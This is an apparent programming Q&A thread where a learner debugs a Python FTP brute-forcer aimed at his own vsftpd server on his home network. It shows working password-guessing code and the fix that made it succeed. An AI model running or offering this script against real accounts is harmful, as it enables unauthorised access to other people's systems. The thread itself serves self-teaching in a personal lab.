# Python ftp bruteforcer not working

Tags: python, python-2.7, ftp, brute-force

as i try to teach myself python i opened an FTP server on my laptop (ubuntu 12.04) using vsftpd. after the config i can login on the laptop itself using
`ftp localhost`
and the username and password i chose were `NINJA` `123` (for the sake of trying).
on my PC (in the lan) i open a browser, enter `ftp://192.168.1.108/`. and when i get a popup for username and password i enter above details - so - Everything works FTP wise.

i wrote this to try and break in:

```
import socket
import ftplib

port=21
ip="192.168.1.108"
file1="passwords"

try:
    s=socket.socket()
    s.connect((ip,port))
    print "port",port,"is open"
    moshe=open(file1,'r')
    for line in moshe.readlines():
        password=line.strip("\n")
        print password
        try:
            ftp = ftplib.FTP(ip)
            ftp.login("NINJA",password)
            print ("THE PASSWORD IS:",password)
            break
        except ftplib.error_perm:
            print "Incorrect"
    moshe.close()
except:
    print "port",port,"is closed"
```

seems to work thanks to rob

Comment: Could you check the VSFTPD log? Is there any information suggesting the script tried to log in?

Comment: Simplify your example. Get rid of the password file and try connecting with `ftp.login("NINJA", "123")` directly.

Comment: @UliKöhler i will gladly do that, if youd be kind enough to tell me where it is located at
Robᵩ i changed it but still it doesn't work

Comment: @Giladiald - "*i changed it but still it doesn't work*". Then you didn't get rid of enough. If you had continued down the path of deleting lines, eventually you would have seen the error message: `NameError: name 'ftp' is not defined` and that would have given you your clue.

Comment: @Giladiald I believe the issue can at the current state be resolved faster by following Robphi's suggestions, meaning to *really* condense down your code (and posting it here, if it isn't obvious.). Or just read the answer of CheckNate...

Answer (score 3, accepted):

I am only learning python myself but aren't you trying to reference the ftplib library incorrectly in your try block?  You are using `ftp.ftplib.FTP(ip)`...shouldn't it just be `ftplib.FTP(ip)`?  Same for `ftp.login("NINJA", password)`.

Comment: +1 Thus proving that one should never use the catch-all `except:` clause. From the [Python tutorial](http://docs.python.org/2/tutorial/errors.html#handling-exceptions): "*Use this with extreme caution, since it is easy to mask a real programming error in this way!"

Comment: @checknate could you try and help me understand? i switched to `ftplib.FTP(ip)`, but i wasn't sure what i should replace the `ftp.login` with @Rob honestly i hate except seeing that it invalidates pretty much everything, i was just unsuck what other loop i could use in this case

Comment: @Giladiald, try this: `try:` / `ftp = ftplib.FTP(ip)` / `ftp.login("NINJA",password)` / `print "THE PASSWORD IS:",password` / `except ftplib.error_perm:` / `print "incorrect"`.  See how 1) the `ftp = ` line creates the `ftp` variable that you use in the next line, and `except ftplib.error_perm:` explicitly names which exception it is interested in, ignoring all others.

Comment: @Robᵩ Hey rob it worked! you should post this as an answer so people who this this can rate you up. this time each PW attempt takes 5-4 seconds, which shows its actually trying, before it ran the 500 passwords in 15 seconds or so. now i realize it wasnt trying. i planted `123` at number 14 in the list and when it got to it it worked!